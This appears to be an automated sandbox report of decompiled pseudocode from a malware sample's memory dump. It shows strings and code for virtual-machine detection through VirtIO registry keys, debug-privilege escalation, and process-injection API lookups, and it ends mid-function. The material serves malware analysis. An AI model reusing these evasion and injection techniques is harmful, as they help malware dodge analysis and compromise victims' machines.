                                        			E000001C31C338730790(void* __ebx, void* __ecx, char __esi, void* __rax, void* __rdx, long long __rdi, void* __r8, void* __r9, long long __r14, long long _a8, char _a16, char _a24, signed long long _a40, long long _a48, long long _a104, intOrPtr _a128) {
                                        				signed long long _v0;
                                        				void* __rbx;
                                        				void* __rsi;
                                        				void* __rbp;
                                        				signed int _t48;
                                        				void* _t72;
                                        				char _t73;
                                        				void* _t74;
                                        				signed long long _t88;
                                        				signed long long _t89;
                                        				void* _t91;
                                        				void* _t98;
                                        				char* _t107;
                                        				signed int* _t111;
                                        				signed long long _t117;
                                        				void* _t119;
                                        				void* _t120;
                                        				void* _t121;
                                        				char* _t131;
                                        				void* _t136;
                                        
                                        				_t73 = __esi;
                                        				E000001C31C33880C220();
                                        				_t88 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t89 = _t88 ^ _t121 - __rax;
                                        				_a40 = _t89;
                                        				_t119 = __ecx;
                                        				_t91 = __r9;
                                        				_t136 = __r8;
                                        				_t120 = __rdx;
                                        				if (__ecx > 0) goto 0x387307c9;
                                        				goto 0x387309f6;
                                        				_a48 = __r14;
                                        				E000001C31C338724390(__esi, __r9);
                                        				E000001C31C3387311E0(_t89, _t89);
                                        				_t107 = "Called capi_rsa_priv_dec()\n";
                                        				E000001C31C33872D790(_t89, _t107, __r8, __r9);
                                        				E000001C31C33873F920(__ecx, _t89, _t91, _t91, __ecx, __rdx);
                                        				if (_t89 != 0) goto 0x38730845;
                                        				if ( *0x38909020 != 0) goto 0x3873081e;
                                        				 *0x38909020 = E000001C31C338721CE0(_t89);
                                        				_v0 = 0x3a3;
                                        				_t4 = _t107 - 9; // 0x65
                                        				r8d = _t4;
                                        				E000001C31C3387222D0(_t35, 0x6e,  *0x38909020, _t89, _t91, _t91, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x387309f1;
                                        				r9d = _a128;
                                        				if (r9d == 1) goto 0x387308bb;
                                        				E000001C31C338726420(_t89,  &_a24, _t107, 0x38845258, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				if ( *0x38909020 != 0) goto 0x3873087e;
                                        				 *0x38909020 = E000001C31C338721CE0(_t89);
                                        				_v0 = 0x3aa;
                                        				_t8 = _t107 + 0xa; // 0x78
                                        				r8d = _t8;
                                        				E000001C31C3387222D0(_t40, 0x6e,  *0x38909020, _t89, _t91,  &_a24, _t107, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C338721640(2, _t89, "padding=",  &_a24, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				goto 0x387309f1;
                                        				r8d = 0x3b0;
                                        				_a104 = __rdi;
                                        				_t109 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t98 = _t119;
                                        				E000001C31C338725700();
                                        				_t117 = _t89;
                                        				if (_t89 != 0) goto 0x3873091c;
                                        				if ( *0x38909020 != 0) goto 0x387308f5;
                                        				 *0x38909020 = E000001C31C338721CE0(_t89);
                                        				_v0 = 0x3b1;
                                        				_t131 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
                                        				_t12 = _t109 - 0x2d; // 0x41
                                        				r8d = _t12;
                                        				E000001C31C3387222D0(_t45, 0x6e,  *0x38909020, _t89, _t91, _t98, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t119, _t120, _t131);
                                        				goto 0x387309e9;
                                        				if (_t73 <= 0) goto 0x38730942;
                                        				_t111 = _t119 - 1 + _t117;
                                        				_t48 =  *(_t98 + _t120) & 0x000000ff;
                                        				 *_t111 = _t48;
                                        				_t112 = _t111 - 1;
                                        				if (_t98 + 1 - _t119 < 0) goto 0x38730930;
                                        				r9d = 0;
                                        				_a16 = _t73;
                                        				_a8 =  &_a16;
                                        				_v0 = _t117;
                                        				_t21 = _t131 + 1; // 0x1
                                        				r8d = _t21;
                                        				__imp__CryptDecrypt();
                                        				if (_t48 != 0) goto 0x387309bf;
                                        				if ( *0x38909020 != 0) goto 0x38730981;
                                        				 *0x38909020 = E000001C31C338721CE0( &_a16);
                                        				_v0 = 0x3ba;
                                        				_t23 = _t112 - 5; // 0x69
                                        				r8d = _t23;
                                        				E000001C31C3387222D0(_t50, 0x6e,  *0x38909020,  &_a16, _t91,  *((intOrPtr*)(_t89 + 0x10)), _t111 - 1, _t119, _t120, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
                                        				E000001C31C33872DA10( *0x38909020,  &_a16, _t111 - 1);
                                        				r8d = 0x3bc;
                                        				E000001C31C338725750();
                                        				goto 0x387309e9;
                                        				E000001C31C33880DC90(_t50, _t72, _t73, _t74, _t136, _t117, _t117, _t119, _a16);
                                        				r8d = 0x3c1;
                                        				E000001C31C338725750();
                                        				E000001C31C33880C290();
                                        				return __ebx;
                                        			}
























                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Called capi_rsa_priv_dec()$padding=
                                        • API String ID: 0-3671336825
                                        • Opcode ID: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction ID: 6c19f3ee7dd3feb8c5e663a6d23311a2263c6a7ee37bb2bae6c26ac7651fb4ad
                                        • Opcode Fuzzy Hash: f2e44db5cb2352129625bcebb1a276bec3d738dedd622a7a7a070fede8a05b0c
                                        • Instruction Fuzzy Hash: 9C61A0723817C086F620DB25E804FDA77A6B744B90F50E213ADA987796DB78C744CB83
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCrypt$CertCertificateDestroyFreeRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 1168903292-3997076816
                                        • Opcode ID: 495a82722c32e399db1cc8026540f08409f35216fe110391c0baaf5cbd506f3b
                                        • Instruction ID: 8714086566b335092785e42d1d36a6ef6cef0c70274b216e98f04d06ed563a00
                                        • Opcode Fuzzy Hash: 495a82722c32e399db1cc8026540f08409f35216fe110391c0baaf5cbd506f3b
                                        • Instruction Fuzzy Hash: 180136367916C086FB54EB11E854B996362FB89B80F54E022DD290B796DE38C6948702
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ContextCrypt$CertCertificateDestroyFreeRelease
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 1168903292-3997076816
                                        • Opcode ID: bf1e1f54ba9f360e09a85b4cf164ce169f3335bc883477a9e6037b130202e7cc
                                        • Instruction ID: 8cb46dd93116de50d71fe7177c1c1944da29babb52b7bed20fa93e3fc4830266
                                        • Opcode Fuzzy Hash: bf1e1f54ba9f360e09a85b4cf164ce169f3335bc883477a9e6037b130202e7cc
                                        • Instruction Fuzzy Hash: 9501A97A3417C082FB54EB21E854FD92362FB98BC0F49E0229D290B796DE3CC6818743
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Variant$Clear$String$_com_issue_error$FreeInit$Alloc
                                        • String ID: CreateFlags$ProcessId$ProcessStartupInformation$ReturnValue$ShowWindow
                                        • API String ID: 2067041508-2207766347
                                        • Opcode ID: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction ID: d28032081ea4a56850e43b570d3d4dbbff06023a4140c2f14a62c637fde380c6
                                        • Opcode Fuzzy Hash: 928b80573e51ff3e9ef2be97ae4f12264b351f62580b05883e0d2c2687bf9381
                                        • Instruction Fuzzy Hash: 00811536240B84C6EB10DF69E89479D77B0FB88B98F409516EE5E87B68DF38C648C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 61%
                                        			E000001C31C33872A2A0() {
                                        				void* _t42;
                                        				void* _t51;
                                        				intOrPtr _t52;
                                        				void* _t58;
                                        				void* _t64;
                                        				void* _t65;
                                        				void* _t78;
                                        				signed long long _t79;
                                        				signed long long _t80;
                                        				char* _t84;
                                        				signed long long _t85;
                                        				long long _t86;
                                        				long long _t96;
                                        				signed long long _t99;
                                        				int _t103;
                                        				long long _t106;
                                        				int _t107;
                                        				void* _t108;
                                        				signed long long _t109;
                                        				void* _t110;
                                        				void* _t111;
                                        				void* _t112;
                                        				long long _t113;
                                        				signed long long _t115;
                                        				long long _t116;
                                        				void* _t120;
                                        				void* _t121;
                                        				long _t122;
                                        
                                        				 *((long long*)(_t110 + 8)) = _t86;
                                        				 *((long long*)(_t110 + 0x10)) = _t96;
                                        				 *((long long*)(_t110 + 0x18)) = _t113;
                                        				 *((long long*)(_t110 + 0x20)) = _t116;
                                        				E000001C31C33880C220();
                                        				_t111 = _t110 - _t78;
                                        				_t109 = _t111 + 0x50;
                                        				_t79 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t80 = _t79 ^ _t109;
                                        				 *(_t109 + 0x210) = _t80;
                                        				GetStdHandle(_t122);
                                        				_t85 = _t80;
                                        				if (_t80 == 0) goto 0x3872a362;
                                        				if (GetFileType(_t121) == 0) goto 0x3872a362;
                                        				E000001C31C33871E120(_t39);
                                        				 *((long long*)(_t111 + 0x28)) = _t109 + 0x268;
                                        				 *(_t111 + 0x20) = _t107;
                                        				r8d = 0x200;
                                        				_t42 =  <  ? 0xffffffff : E000001C31C338816A8C(_t51, 0xfffffff4, _t58, 0x200, _t64, _t65, _t85,  *_t80 | 0x00000001, _t109 + 0x10, _t107, _t113,  *((intOrPtr*)(_t109 + 0x260)));
                                        				if (_t42 < 0) goto 0x3872a344;
                                        				 *(_t111 + 0x20) = _t107;
                                        				r8d = _t42;
                                        				WriteFile(_t108, ??, ??, ??);
                                        				goto 0x3872a52c;
                                        				_t52 = E000001C31C33872A5B0( *((intOrPtr*)(_t109 + 0x260))) + 1;
                                        				_t15 = _t80 + _t80 + 0xf; // 0x10
                                        				if (_t15 - _t80 + _t80 > 0) goto 0x3872a38b;
                                        				E000001C31C33880C220();
                                        				_t112 = _t111 - 0xfffffff0;
                                        				if (_t112 + 0x50 != 0) goto 0x3872a3b2;
                                        				_t106 = L"no stack?";
                                        				goto 0x3872a47a;
                                        				 *((intOrPtr*)(_t112 + 0x28)) = _t52;
                                        				r9d = _t52;
                                        				 *((long long*)(_t112 + 0x20)) = _t106;
                                        				if (MultiByteToWideChar(_t103, _t107, _t84) != 0) goto 0x3872a3f7;
                                        				_t99 = _t107;
                                        				if (_t85 == 0) goto 0x3872a3f7;
                                        				 *((short*)(_t106 + _t99 * 2)) =  *((char*)(_t99 +  *((intOrPtr*)(_t109 + 0x260))));
                                        				if (_t99 + 1 - _t85 < 0) goto 0x3872a3e0;
                                        				_t115 = _t107;
                                        				if (_t85 == 0) goto 0x3872a47a;
                                        				r10d = 0x53;
                                        				r11d = _t120 + 0x20;
                                        				r14d = _t120 - 0x10;
                                        				r15d = _t120 + 0x10;
                                        				if ( *((short*)(_t106 + _t115 * 2)) != 0x25) goto 0x3872a472;
                                        				if (( *(_t106 + 2 + _t115 * 2) & 0x0000ffff) + 0xffffffd6 - 0x49 > 0) goto 0x3872a472;
                                        				goto __rcx;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite_invalid_parameter_noinfo
                                        • String ID: OpenSSL$OpenSSL: FATAL$no stack?
                                        • API String ID: 3447168048-278800372
                                        • Opcode ID: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction ID: d8ee0f4dbb4f0bcf208d5e3d54759f5b85dc940457f69cd70a3cda8993db6374
                                        • Opcode Fuzzy Hash: 327d4abda4e7108db4f5c15a324cbebe442dd0e14d6fedb6e28765cb1fe8b8f8
                                        • Instruction Fuzzy Hash: A961E073240BC096FB208F24E844BD9B3A5F744B94F54A626EE6A4BB95DF38C351C301
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseHandleProc$CurrentLibraryLoadLookupPrivilegeProcessValue
                                        • String ID: AdjustTokenPrivileges$Advapi32.dll$OpenProcessToken$SeDebugPrivilege
                                        • API String ID: 1752774111-261832459
                                        • Opcode ID: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction ID: 18300f01d5d88b80ad5079e934d5b6500ac20100f31064abb624615c88ec13fc
                                        • Opcode Fuzzy Hash: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction Fuzzy Hash: D7213272615B8082EB40CF55F8546DAB3A0F788794F409027DDAA87B28EF78C658CB01
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 27%
                                        			E000001C31C33871BAE0(intOrPtr __ecx, long long* __rax, long long __rbx, long long* __rdx, long long __rdi, long long __rsi, long long* __r8, long long _a8, long long _a16, long long _a24, long long _a32) {
                                        				void* _v40;
                                        				intOrPtr _v64;
                                        				long long _v72;
                                        				long long _v80;
                                        				intOrPtr _v88;
                                        				void* _v96;
                                        				long long _v104;
                                        				long long _v120;
                                        				intOrPtr _v128;
                                        				intOrPtr _v136;
                                        				void* __rbp;
                                        				intOrPtr _t38;
                                        				void* _t43;
                                        				void* _t54;
                                        				intOrPtr _t55;
                                        				void* _t57;
                                        				long long* _t63;
                                        				void* _t89;
                                        				long long* _t98;
                                        				long long* _t99;
                                        
                                        				_t86 = __rsi;
                                        				_t64 = __rbx;
                                        				_t63 = __rax;
                                        				_t49 = __ecx;
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_a24 = __rdi;
                                        				_t99 = __r8;
                                        				_t98 = __rdx;
                                        				_a32 = __rbx;
                                        				_t55 = __ecx;
                                        				_v96 = __rbx;
                                        				_v88 = 0;
                                        				_t7 = _t64 + 0x28; // 0x28
                                        				r8d = _t7;
                                        				E000001C31C33880E410(__ecx, 0, _t54, _t57,  &_v80, __rdx, __rdi, __r8);
                                        				_v104 = __rbx;
                                        				GetModuleHandleW(??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				GetProcAddress(??, ??);
                                        				_v104 = _t55;
                                        				_v88 = 0x30;
                                        				_v120 = __rsi;
                                        				asm("xorps xmm0, xmm0");
                                        				_v128 = 0x8000000;
                                        				_v80 = __rsi;
                                        				_t17 = _t86 + 0x40; // 0x40
                                        				_t38 = _t17;
                                        				_v72 = __rsi;
                                        				_v64 = _t38;
                                        				_v136 = _t38;
                                        				asm("movdqu [ebp-0x10], xmm0");
                                        				if ( *_t63() < 0) goto 0x3871bbfe;
                                        				GetCurrentProcess();
                                        				if (E000001C31C33871B9B0(_t63, _t63, _a32, _t63, _t89,  &_v96) != 0) goto 0x3871bc05;
                                        				r8d = _v104;
                                        				E000001C31C33880E410(_t49, 0, _t54, _t57, _v96, _t63, _t63,  &_v96);
                                        				 *_t98 = _v96;
                                        				if (_t99 == 0) goto 0x3871bc05;
                                        				 *_t99 = _a32;
                                        				goto 0x3871bc09;
                                        				_t43 =  *_t63();
                                        				if (_a32 == 0) goto 0x3871bc16;
                                        				if (_t99 != 0) goto 0x3871bc16;
                                        				 *_t63();
                                        				return _t43;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$CurrentProcess
                                        • String ID: 0$NtCreateSection$RtlNtStatusToDosError$ZwClose$ntdll.dll
                                        • API String ID: 1077269151-3111467594
                                        • Opcode ID: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction ID: 6f800c8370ae2320755a0628ab5b72db65ce0720f9ba3753013a1c62299358ac
                                        • Opcode Fuzzy Hash: 8efdbcc87b961bce842ecd1f6197e8cd36daaac88b2062f1e09bf8dfbb529105
                                        • Instruction Fuzzy Hash: 52415C32751B508AFB10CF66E844ADD37B5F788B98F149126EE5A97B08EF34C685C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E000001C31C338820430(struct _IO_FILE* __rbx, long long __rcx, long long __rdx, void* __rdi, void* __rsi, long __r14) {
                                        				intOrPtr _t33;
                                        				int _t40;
                                        				void* _t41;
                                        				void* _t51;
                                        				void* _t53;
                                        				signed long long _t60;
                                        				signed long long _t61;
                                        				signed long long _t63;
                                        				long long _t84;
                                        				void* _t87;
                                        				void* _t89;
                                        				signed long long _t90;
                                        
                                        				_t90 = _t89 - 0x4f0;
                                        				_t60 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t61 = _t60 ^ _t90;
                                        				 *(_t89 - 0x3f0 + 0x3e0) = _t61;
                                        				_t84 = __rcx;
                                        				 *((long long*)(_t90 + 0x40)) = __rcx;
                                        				 *((long long*)(_t90 + 0x58)) = __rdx;
                                        				r14d = r8d;
                                        				 *((intOrPtr*)(_t90 + 0x38)) = r8d;
                                        				GetStdHandle(__r14);
                                        				_t6 = _t61 - 1; // -1
                                        				if (_t6 - 0xfffffffd > 0) goto 0x388204f9;
                                        				if (GetFileType(__rdi) != 2) goto 0x388204f9;
                                        				 *((intOrPtr*)(_t90 + 0x28)) = r14d;
                                        				 *((long long*)(_t90 + 0x20)) = __rdx;
                                        				_t33 = E000001C31C338820670(_t41, 0xfffffff4, 0x240, _t51, _t53, GetFileType(__rdi) - 2, _t61, _t90 + 0x60, __rdx, L"Assertion failed: %Ts, file %Ts, line %d\n", __rcx, __rsi);
                                        				if (_t33 < 0) goto 0x388204f9;
                                        				_t63 = (_t61 | 0xffffffff) + 1;
                                        				if ( *((intOrPtr*)(_t90 + 0x60 + _t63 * 2)) != 0) goto 0x388204c7;
                                        				_t95 = _t90 + 0x30;
                                        				 *((intOrPtr*)(_t90 + 0x30)) = 0;
                                        				r8d = _t33;
                                        				 *((long long*)(_t90 + 0x20)) = _t84;
                                        				if (WriteConsoleW(_t87, ??, ??, ??) == 0) goto 0x388204f9;
                                        				abort();
                                        				asm("int3");
                                        				E000001C31C33881768C(2, _t63);
                                        				if (( *(_t63 + 0x14) & 0x000004c0) != 0) goto 0x38820529;
                                        				E000001C31C33881768C(2, _t63);
                                        				r9d = 0;
                                        				_t20 = _t95 + 4; // 0x4
                                        				r8d = _t20;
                                        				E000001C31C33882C8E4(0, _t63, _t61, _t63, _t90 + 0x60, _t90 + 0x30);
                                        				L2();
                                        				 *(_t90 + 0x48) = _t63;
                                        				E000001C31C33881768C(2, _t63);
                                        				 *(_t90 + 0x50) = _t63;
                                        				 *((long long*)(_t90 + 0x20)) = _t90 + 0x38;
                                        				L1();
                                        				E000001C31C33881768C(2, _t90 + 0x38);
                                        				_t40 = fflush(__rbx);
                                        				abort();
                                        				asm("int3");
                                        				asm("int3");
                                        				r10d =  *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x28))));
                                        				 *((intOrPtr*)(_t90 + 0x28)) = r10d;
                                        				goto 0x3882062c;
                                        				asm("int3");
                                        				asm("int3");
                                        				return _t40;
                                        			}

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: abort$ConsoleFileHandleTypeWritefflushswprintf
                                        • String ID: Assertion failed: %Ts, file %Ts, line %d$Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1760031326-1349988364
                                        • Opcode ID: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction ID: bc8d90eed77dee528562e27ae49ddc6498a3e2f40bf318c3ca6d64eb3ac62130
                                        • Opcode Fuzzy Hash: 069c7830e6e6b571874dd099d804a634adff7791f68b9f21957c8a256731c135
                                        • Instruction Fuzzy Hash: 88317272294AC082F714EB65E815BDA73A4F7847A4F50A217EE794BBD9DF38C6048701
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 21%
                                        			E000001C31C338720250(long long __rbx, long long __rsi, long long _a8, long long _a16) {
                                        				void* _v8;
                                        				signed long long _v24;
                                        				char _v536;
                                        				long long _v544;
                                        				long long _v552;
                                        				long long _v560;
                                        				long long _v568;
                                        				long long _v576;
                                        				long long _v584;
                                        				long long _v592;
                                        				char _v600;
                                        				long long _v616;
                                        				void* __rdi;
                                        				void* _t30;
                                        				void* _t33;
                                        				void* _t35;
                                        				signed long long _t39;
                                        				void* _t58;
                                        				void* _t60;
                                        				void* _t64;
                                        				void* _t67;
                                        
                                        				_a8 = __rbx;
                                        				_a16 = __rsi;
                                        				_t39 =  *0x38903000; // 0x9bfaf736ae76
                                        				_v24 = _t39 ^ _t64 - 0x00000280;
                                        				_v592 = L"SYSTEM\\ControlSet001\\Services\\vioscsi";
                                        				_v584 = L"SYSTEM\\ControlSet001\\Services\\viostor";
                                        				_v576 = L"SYSTEM\\ControlSet001\\Services\\VirtIO-FS Service";
                                        				_v568 = L"SYSTEM\\ControlSet001\\Services\\VirtioSerial";
                                        				_v560 = L"SYSTEM\\ControlSet001\\Services\\BALLOON";
                                        				_v552 = L"SYSTEM\\ControlSet001\\Services\\BalloonService";
                                        				_v544 = L"SYSTEM\\ControlSet001\\Services\\netkvm";
                                        				r8d = 0x200;
                                        				E000001C31C33880E410(_t30, 0, _t33, _t35,  &_v536, _t58, _t60, _t67);
                                        				0x3871e130();
                                        				_v600 = __rsi;
                                        				r9d = 0x20019;
                                        				_v616 =  &_v600;
                                        				r8d = 0;
                                        				if (RegOpenKeyExW(??, ??, ??, ??, ??) == 0) goto 0x38720339;
                                        				if (__rbx + 1 - 7 < 0) goto 0x387202d0;
                                        				goto 0x38720349;
                                        				RegCloseKey(??);
                                        				E000001C31C33880C290();
                                        				return 1;
                                        			}
























                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpen
                                        • String ID: Checking reg key %s $SYSTEM\ControlSet001\Services\BALLOON$SYSTEM\ControlSet001\Services\BalloonService$SYSTEM\ControlSet001\Services\VirtIO-FS Service$SYSTEM\ControlSet001\Services\VirtioSerial$SYSTEM\ControlSet001\Services\netkvm$SYSTEM\ControlSet001\Services\vioscsi$SYSTEM\ControlSet001\Services\viostor
                                        • API String ID: 47109696-2595593112
                                        • Opcode ID: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction ID: 1f2c146057438ccfcd91868252aa2785fb9b30880611493884c0b551a3c46ba8
                                        • Opcode Fuzzy Hash: 5fcd67d3b96c9805d83ee532e5670651764c04fb282fe68a4cc2dfb8abe56a19
                                        • Instruction Fuzzy Hash: 6E316936255FC092FA508B15F484BCAB3A8F788780F50A127EEAD47B69DF38C215CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E000001C31C3388288C8(void* __edx, char* __r8, void* __r9) {
                                        				signed long long _t9;
                                        				signed long long _t10;
                                        				void* _t15;
                                        
                                        				_t9 =  *0x38903000; // 0x9bfaf736ae76
                                        				_t10 = _t9 ^ _t15 - 0x000000c0;
                                        				 *(_t15 - 0x4f + 0x3f) = _t10;
                                        				if (__r9 - _t10 + 4 >= 0) goto 0x38828914;
                                        				 *__r8 = 0;
                                        				E000001C31C33880C290();
                                        				return 0xc;
                                        			}






                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                        • API String ID: 3215553584-2617248754
                                        • Opcode ID: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction ID: bc45d4e2e442a279b355d88914cb0c354b8d26810b72fce33bf1de91c3ef7da6
                                        • Opcode Fuzzy Hash: c27a961c99c4b90775e64e9477821c3fb21b6c96bf9c920cb1ab29b6d578e68f
                                        • Instruction Fuzzy Hash: 9E419C72741B8489FB14DF65E841BCD33A4F718788F40A526EEAC4BB95EE39C625C341
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.779533341.000001C3386E0000.00000040.10000000.00040000.00000000.sdmp, Offset: 000001C3386E0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_1c3386e0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModuleProtectVirtual
                                        • String ID: SleepEx$UD3"$WriteProcessMemory$kernel32.dll
                                        • API String ID: 2492872976-2122506030
                                        • Opcode ID: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction ID: bc33ae9f11ea448656c70683bf3542952d5fca31bbe4220393918502d7951df9
                                        • Opcode Fuzzy Hash: f3b16c542549372e70ea8ee859f74782e9ac290f33c255a486bcc054e6462a3f
                                        • Instruction Fuzzy Hash: D9216B76B01A808AFB21CF66E804ADD7B64F358BD8F445126DE5D1BB48DF38C6858B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 66%
                                        			E000001C31C338703DD0(void* __ebx, void* __ecx, void* __edx, long long __rbx, intOrPtr* __rcx, long long* __rdx, long long __r8) {
                                        				void* __rdi;
                                        				void* __rsi;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t65;
                                        				void* _t66;
                                        				void* _t67;
                                        				void* _t68;
                                        				long long _t84;
                                        				long long _t93;
                                        				long long* _t98;
                                        				intOrPtr _t101;
                                        				long long _t117;
                                        				void* _t126;
                                        				long long _t129;
                                        				void* _t130;
                                        				long long _t131;
                                        				intOrPtr* _t132;
                                        				intOrPtr _t134;
                                        				void* _t135;
                                        				void* _t137;
                                        				long long* _t142;
                                        				long long _t145;
                                        
                                        				_t65 = __edx;
                                        				_t64 = __ecx;
                                        				_t63 = __ebx;
                                        				 *((long long*)(_t135 + 0x48)) = 0xfffffffe;
                                        				 *((long long*)(_t135 + 0x168)) = __rbx;
                                        				_t131 = __r8;
                                        				_t142 = __rdx;
                                        				_t98 = __rcx;
                                        				_t101 =  *((intOrPtr*)(__rcx + 0x20));
                                        				_t129 =  *((intOrPtr*)(__rcx + 0x10));
                                        				if (__r8 - _t101 - _t129 > 0) goto 0x38703e20;
                                        				 *((long long*)(__rcx + 0x18)) = _t129 + __r8;
                                        				 *__rdx = _t129;
                                        				 *((long long*)(__rdx + 8)) = __r8;
                                        				goto 0x38703fea;
                                        				_t130 = _t129 -  *((intOrPtr*)(__rcx + 8));
                                        				if (__r8 - _t101 -  *__rcx - _t130 > 0) goto 0x38703e5d;
                                        				if (_t130 == 0) goto 0x38703e45;
                                        				_t137 = _t130;
